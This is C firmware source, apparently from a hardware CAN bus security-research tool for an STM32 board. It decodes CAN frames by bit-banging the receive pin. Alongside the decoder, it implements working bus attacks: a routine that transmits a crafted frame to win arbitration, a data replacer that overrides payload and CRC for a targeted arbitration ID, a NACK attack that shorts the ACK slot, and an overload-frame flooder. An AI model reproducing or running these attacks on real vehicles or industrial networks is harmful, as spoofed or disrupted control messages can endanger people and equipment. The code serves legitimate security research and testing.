==> bitbane/CANT/src/can.c <==
#include "stm32h7xx.h"
#include "stm32h7xx_hal_dma.h"
#include "stm32h7xx_hal_rcc.h"
#include "stm32h7xx_hal_tim.h"
#include "stm32h7xx_hal_gpio.h"
#include "stm32h7xx_hal_cortex.h"
#include <stdio.h>
#include "can.h"
#include <stdbool.h>
#include "usart.h"
#define SHORT_ON GPIOA->ODR |= GPIO_PIN_5
#define SHORT_OFF GPIOA->ODR &= ~GPIO_PIN_5

void can_init()
{
    /* Enable TIM4 and TIM3 clock */
    __HAL_RCC_TIM4_CLK_ENABLE();
    __HAL_RCC_TIM3_CLK_ENABLE();

    /* Set up the TIM4 and TIM3 interrupt */
    HAL_NVIC_SetPriority(TIM4_IRQn, 0, 0);
    HAL_NVIC_EnableIRQ(TIM4_IRQn);
    HAL_NVIC_SetPriority(TIM3_IRQn, 0, 0);
    HAL_NVIC_EnableIRQ(TIM3_IRQn);

    /* Set up the TIM4 peripheral */
    TIM_InitStructure.ClockDivision = TIM_CLOCKDIVISION_DIV4;
    TIM_InitStructure.Prescaler = 9; /* APB1 clock is at 100 MHz, and this timer counts at twice that speed. Count every 500 ns. Note: The prescale value used is the register value + 1 */
    TIM_InitStructure.CounterMode = TIM_COUNTERMODE_UP;
    TIM_InitStructure.Period = 2000 / TIMER_PERIOD_NS; /* Start with 2 microseconds, which equates to 500 KBPS */
    TIM_Base_SetConfig(TIM4, &TIM_InitStructure);
    timer4_callback_handler = NULL;

    /* Set up the TIM3 peripheral */
    TIM_InitStructure.ClockDivision = TIM_CLOCKDIVISION_DIV4;
    TIM_InitStructure.Prescaler = 9; /* APB1 clock is at 100 MHz, and this timer counts at twice that speed. Count every 500 ns. Note: The prescale value used is the register value + 1 */
    TIM_InitStructure.CounterMode = TIM_COUNTERMODE_UP;
    TIM_InitStructure.Period = 2000 / TIMER_PERIOD_NS; /* Start with 2 microseconds, which equates to 500 KBPS */
    TIM_Base_SetConfig(TIM3, &TIM_InitStructure);

    /* Set up the EXTI interrupt */
    HAL_NVIC_SetPriority(EXTI15_10_IRQn, 0, 0);
}

void can_poll()
{
    if(frame_done)
    {
        frame_done = 0;
#ifdef DEBUG_PRINT
        printf("Arbid: %lx\r\n", arbid);
        write_string("Msg: ");
        for(int i = 0; i < msg_len; i++)
        {
            write_int(message[i]);
            write_string(" ");
        }
        printf("\r\nCRC: %lx\r\n", can_rx_crc);
#endif
        /* After 128 frames, turn the LED on */
        if ((frames_seen & 0x000000FF) == 128)
        {
            BSP_LED_On(LED2);
        }
        else if((frames_seen & 0xFF) == 0)
        {
            BSP_LED_Off(LED2);
        }
    }
}

void can_sync()
{
    TIM4->ARR = can_ticks_per_cycle >> 1;
    TIM4->CNT = 0;
    timer4_callback_handler = sync_callback;
    synchronized = 0;
    same_bits_count = 0;

    // Enable timer and interrupt
    TIM4->DIER |= TIM_IT_UPDATE;
    TIM4->CR1 |= TIM_CR1_CEN;

    write_string("Synchronizing CAN bus...");
    while(!synchronized);
    write_string("Done\r\n");

    // Enable the external interrupt on the RX pin
    while(__HAL_GPIO_EXTI_GET_IT(GPIO_PIN_12) > 0)
        __HAL_GPIO_EXTI_CLEAR_IT(GPIO_PIN_12); // Clear any pending interrupt
    while(NVIC_GetPendingIRQ(EXTI15_10_IRQn) == 1)
        NVIC_ClearPendingIRQ(EXTI15_10_IRQn);
    NVIC_EnableIRQ(EXTI15_10_IRQn);
}

static void sync_callback(void)
{
    /* Check to see if we are getting a 1 */
    if((GPIOB->IDR & GPIO_PIN_12) > 0)
        same_bits_count++;
    else
        same_bits_count = 0;

    if(same_bits_count >= 14)
    {
        synchronized = 1;
        can_timer_stop();
    }
}

static void sample_callback(void)
{
    uint16_t bit_read = 0;
    if (GPIOB->IDR & GPIO_PIN_12)
        bit_read = 1;

    /* Check to see if this is a stuff bit */
    if (same_bits_count >= 5) /* This is a stuff bit or an error frame */
    {
        if(bit_read == last_bit) // If we're reading the same bit a 6th time, this is an error frame
        {
            bits_read = 255; // This will effectively end the processing for this message and we will start over with the next one
        }
        else // Different bit level is for a stuff bit
        {
            // But don't forget that stuff bits count for the 5 same levels in a row
            same_bits_count = 1;
            last_bit = bit_read;
        }
    }
        
    else /* Not a stuff bit */
    {
        bits_read++;

        /* Track consecutive bits */
        if(bit_read == last_bit)
            same_bits_count++;
        else
            same_bits_count = 1;
        last_bit = bit_read;

        /* Populate the correct item based on position */
        // bit 1 is SOF, ignore it
        if(bits_read >= 2 && bits_read <= 12)
        {
            arbid <<= 1;
            arbid |= bit_read;
        }

        // bit 13 remote transmission request
        else if(bits_read == 14)
            extended_arbid = bit_read;

        /* From here, message length is based on whether or not we have an extended identifier. */
        if(extended_arbid == 0 && bits_read > 14)
        {
            // bit 15 is reserved
            if(bits_read >= 16 && bits_read <= 19)
            {
                msg_len <<= 1;
                msg_len |= bit_read;
            }
            else if(bits_read >= 20 && bits_read < (20 + (8 * msg_len)))
            {
                message[msg_byte] <<= 1;
                message[msg_byte] |= bit_read;

                if(bits_read - 20 - (msg_byte * 8) >= 7)
                    msg_byte++;
            }
            else if(bits_read >= (20 + (8 * msg_len)) && bits_read < (35 + (8 * msg_len)))
            {
                can_rx_crc <<= 1;
                can_rx_crc |= bit_read;

                if(bits_read == (34 + (8 * msg_len))) // Last bit of the CRC
                {
                    /* There is no bit stuffing for the CRC delimiter, ACK slot, or ACK delimiter */
                    same_bits_count = 0;
                }
            }
            else if(bits_read == (35 + (8 * msg_len))) // This is the CRC Delimiter
            {
                if(nack_attack > 0)
                    timer3_callback_handler = short_on;
            }
            else if(bits_read == (36 + (8 * msg_len))) // This is the ACK slot
            {
                if(nack_attack > 0)
                    timer3_callback_handler = short_off;
            }
            // else if(bits_read == (37 + (8 * msg_len))) // This is the ACK Delimiter
            // else if((bits_read >= (38 + (8 * msg_len))) && (bits_read < (45 + (8 * msg_len)))) // End Of Frame bits
            // else if((bits_read >= (45 + (8 * msg_len))) && (bits_read < (48 + (8 * msg_len)))) // Inter Frame Segment TODO: Not presently accounting for overload frames
        }
        else if (bits_read > 14)
        {
            if(bits_read >= 15 && bits_read <= 32)
            {
                arbid <<= 1;
                arbid |= bit_read;
            }
            // bit 33 is remote transmission request
            // bits 34 and 35 are reserved
            else if(bits_read >= 36 && bits_read <= 39)
            {
                msg_len <<= 1;
                msg_len |= bit_read;
            }
            else if(bits_read >= 40 && bits_read < (40 + (8 * msg_len)))
            {
                message[msg_byte] <<= 1;
                message[msg_byte] |= bit_read;

                if(bits_read - 40 - (msg_byte * 8) >= 7)
                    msg_byte++;
            }
            else if(bits_read >= (40 + (8 * msg_len)) && bits_read < (55 + (8 * msg_len)))
            {
                can_rx_crc <<= 1;
                can_rx_crc |= bit_read;
                if(bits_read == (54 + (8 * msg_len))) // Last bit of the CRC
                {
                    /* There is no bit stuffing for the CRC delimiter, ACK slot, or ACK delimiter */
                    same_bits_count = 0;
                }
            }
            else if(bits_read == (55 + (8 * msg_len))) // This is the CRC Delimiter
            {
                if(nack_attack > 0)
                    timer3_callback_handler = short_on;
            }
            else if(bits_read == (56 + (8 * msg_len))) // This is the ACK slot
            {
                if(nack_attack > 0)
                    timer3_callback_handler = short_off;
            }
            // else if(bits_read == (57 + (8 * msg_len))) // This is the ACK Delimiter
            // else if((bits_read >= (58 + (8 * msg_len))) && (bits_read < (65 + (8 * msg_len)))) // End Of Frame bits
            // else if((bits_read >= (65 + (8 * msg_len))) && (bits_read < (68 + (8 * msg_len)))) // Inter Frame Segment TODO: Not presently accounting for overload frames
        }
    }
    /* Currently skipping the EOF Header */
    if((extended_arbid == 0 && bits_read >= (20 + 18 + (8 * msg_len))) ||
       (extended_arbid == 1 && bits_read >= (40 + 18 + (8 * msg_len))))
    {
        can_timer_stop();
        // Enable the external interrupt on the RX pin
        frame_done = 1;
        frames_seen++;
        same_bits_count = 1;
        bits_read = 1;
        last_bit = 0;
 
        // Enable the external interrupt on the RX pin
        while(__HAL_GPIO_EXTI_GET_IT(GPIO_PIN_12) > 0)
            __HAL_GPIO_EXTI_CLEAR_IT(GPIO_PIN_12); // Clear any pending interrupt
        while((NVIC->ISPR[EXTI15_10_IRQn >> 5u] & (1UL << (EXTI15_10_IRQn & 0x1FUL))) != 0UL)
            NVIC->ICPR[EXTI15_10_IRQn >> 5u] = (1UL << (EXTI15_10_IRQn & 0x1FUL));
        HAL_NVIC_EnableIRQ(EXTI15_10_IRQn);

        if(end_of_frame_callback != NULL)
            end_of_frame_callback();
    }
}

void can_timer_stop()
{
    /* Disable the overflow interrupt and timer */
    TIM4->DIER &= ~TIM_IT_UPDATE;
    TIM4->CR1 &= ~TIM_CR1_CEN;

    /* Disable the callback */
    timer4_callback_handler = NULL;
}

void setCanBaudrate(long int baud)
{
    __HAL_GPIO_EXTI_CLEAR_IT(GPIO_PIN_12); // Clear any pending interrupt
    HAL_NVIC_DisableIRQ(EXTI15_10_IRQn);
    can_baud = baud;
    can_ticks_per_cycle = ((1000000000 / can_baud) / TIMER_PERIOD_NS) - 1;

    /* Calculate the 1/2 cycle delay so that the sampling interrupt happens in the middle of the bit.
     * It takes appx 500ns to set up the initial interrupt, so we have that delay already */
    can_initial_delay = (can_ticks_per_cycle >> 1) - (500 / TIMER_PERIOD_NS);

    /* Edge timer interrupt correction calculation. This compensates for the time the EXTI interrupt takes to fire
     * for timer 3 that interrupts on each CAN edge, which is about 450 ns */
    can_edge_interrupt_delay = 450 / TIMER_PERIOD_NS;
}

static void arbid_killer()
{
    if(tx_bit_count <= 3) // First 4 zeros of arbid
        GPIOB->ODR &= ~GPIO_PIN_13;
    else if(tx_bit_count == 4) // First stuff bit
        GPIOB->ODR |= GPIO_PIN_13;
    else if(tx_bit_count <= 9) // Next 5 zeros of arbid
        GPIOB->ODR &= ~GPIO_PIN_13;
    else if(tx_bit_count == 10) // Stuff bit
        GPIOB->ODR |= GPIO_PIN_13;
    else if(tx_bit_count <= 15) // Last two zeros of arbid, no RTR, 11 bit id, and 0 reserved bit
        GPIOB->ODR &= ~GPIO_PIN_13;
    else if(tx_bit_count == 16) // Stuff bit
        GPIOB->ODR |= GPIO_PIN_13;
    else if(tx_bit_count <= 19) // First 3 bits of length
        GPIOB->ODR &= ~GPIO_PIN_13;
    else if(tx_bit_count == 20) // Sending one byte
        GPIOB->ODR |= GPIO_PIN_13;
    else if(tx_bit_count == 21) // First data bit
        GPIOB->ODR &= ~GPIO_PIN_13;
    else if(tx_bit_count == 22) // Second data bit
        GPIOB->ODR |= GPIO_PIN_13;
    else if(tx_bit_count <= 26) // 3-6 data bit
        GPIOB->ODR &= ~GPIO_PIN_13;
    else if(tx_bit_count <= 28) // 7th and 8th data bit
        GPIOB->ODR |= GPIO_PIN_13;
    else if(tx_bit_count == 29) // CRC is 0x3cd1
        GPIOB->ODR &= ~GPIO_PIN_13;
    else if(tx_bit_count <= 33)
        GPIOB->ODR |= GPIO_PIN_13;
    else if(tx_bit_count <= 35) 
        GPIOB->ODR &= ~GPIO_PIN_13;
    else if(tx_bit_count <= 37)
        GPIOB->ODR |= GPIO_PIN_13;
    else if(tx_bit_count == 38) 
        GPIOB->ODR &= ~GPIO_PIN_13;
    else if(tx_bit_count == 39)
        GPIOB->ODR |= GPIO_PIN_13;
    else if(tx_bit_count <= 42) 
        GPIOB->ODR &= ~GPIO_PIN_13;
    else if(tx_bit_count <= 44)
        GPIOB->ODR |= GPIO_PIN_13;
    else if(tx_bit_count == 45) 
        GPIOB->ODR &= ~GPIO_PIN_13;
    else if(tx_bit_count == 46)
        GPIOB->ODR |= GPIO_PIN_13;

    tx_bit_count++;
}

static void data_replacer()
{
    uint8_t bit = 1;
    /* We're going to key off the bit-keeping that we're doing in the 
     * sample_callback function in order to see where we are in the message and
     * to track any necessary bit stuffing. These variables are:
     *
     * same_bits_count - the number of same bits in a row we have seen on the bus
     * bits_read - the number of bits we have read
     * arbid - the current arbitration ID
     * last_bit - value of the last bit read on the bus
     */

    /* Check to see if we have received an arbitration ID and it matches the one we are attacking */
    if((bits_read >= 15) && (arbid == attack_arbid))
    {
        /* Check to see if we need to send a stuff bit */
        if(same_bits_count == 5)
        {
            bit = last_bit ^ 0x01;
            bit <<= data_replacer_force_recessive; // Set bit to two if we are forcing the recessive and transmitting a 1
        }
        /* Let the current transmitter send the RTR, IDE and reserved bits, then take over at the DLC */
        else if(bits_read >= 15 && bits_read <= 18)
        {
            bit = (data_replacer_len >> (18 - bits_read)) & 0x1;
            bit <<= data_replacer_force_recessive; // Set bit to two if we are forcing the recessive and transmitting a 1
        }
        /* Send the data */
        else if((bits_read >= 19) && (bits_read < (19 + data_replacer_len_bits)))
        {
            bit = (data_replacer_data[(bits_read - 19) >> 3] >> (7 - ((bits_read - 19) & 0x7))) & 0x01;
            bit <<= data_replacer_force_recessive; // Set bit to two if we are forcing the recessive and transmitting a 1
        }
        /* Send the CRC */
        else if((bits_read >= (19 + data_replacer_len_bits)) && (bits_read < (34 + data_replacer_len_bits)))
        {
            bit = (data_replacer_crc >> (33 + data_replacer_len_bits - bits_read)) & 0x1;
            bit <<= data_replacer_force_recessive; // Set bit to two if we are forcing the recessive and transmitting a 1
        }
        /* Send the CRC delimiter, ACK slot, ACK delimiter, and EOF */
        else if(bits_read >= 34 + data_replacer_len_bits)
        {
            bit = 1;
        }

        /* Set the calculated level */
        if(bit == 1)
        {
            GPIOB->ODR |= GPIO_PIN_13;
            SHORT_OFF;
        }
        else if(bit == 2)
        {
            GPIOB->ODR |= GPIO_PIN_13;
            SHORT_ON;
        }
        else
        {
            GPIOB->ODR &= ~GPIO_PIN_13;
            SHORT_OFF;
        }
    }
}

void overload_frame()
{
    overload_frame_bit_counter++;

    /* Wait for the end of frame bits, then send six dominant bits */
    if (overload_frame_bit_counter > 8 && overload_frame_bit_counter < 15)
    {
        GPIOB->ODR &= ~GPIO_PIN_13;
    }
    /* Wait for the first recessive bit we see */
    else if (overload_frame_bit_counter >= 15 && overload_frame_first_recessive_bit == 0)
    {
        GPIOB->ODR |= GPIO_PIN_13; // Transmit a recessive ourselves
        if (GPIOB->IDR & GPIO_PIN_12)
            overload_frame_first_recessive_bit = overload_frame_bit_counter;
    }
    /* Wait for 8 recessive bits to be transmitted */
    else if ((overload_frame_first_recessive_bit > 0) && 
             (overload_frame_bit_counter >= overload_frame_first_recessive_bit + 6))
    {
        /* Reset if we are sending more frames */
        overload_frames_sent++;
        if(overload_frames_sent < overload_frame_count)
        {
            overload_frame_bit_counter = 7; // We won't see the 7 EOF bits again 
            overload_frame_first_recessive_bit = 0;
        }
        /* Uninstall ourselves if we are done */
        else
        {
            // Enable the external interrupt on the RX pin
            while(__HAL_GPIO_EXTI_GET_IT(GPIO_PIN_12) > 0)
                __HAL_GPIO_EXTI_CLEAR_IT(GPIO_PIN_12); // Clear any pending interrupt
            while((NVIC->ISPR[EXTI15_10_IRQn >> 5u] & (1UL << (EXTI15_10_IRQn & 0x1FUL))) != 0UL)
                NVIC->ICPR[EXTI15_10_IRQn >> 5u] = (1UL << (EXTI15_10_IRQn & 0x1FUL));
            HAL_NVIC_EnableIRQ(EXTI15_10_IRQn);

            timer3_callback_handler = NULL;
        }
    }
}

void overload_frame_eof()
{
    // Disable the external interrupt on the RX pin
    HAL_NVIC_DisableIRQ(EXTI15_10_IRQn);

    overload_frame_bit_counter = 0;
    overload_frames_sent = 0;
    overload_frame_first_recessive_bit = 0;
    timer3_callback_handler = overload_frame;
}
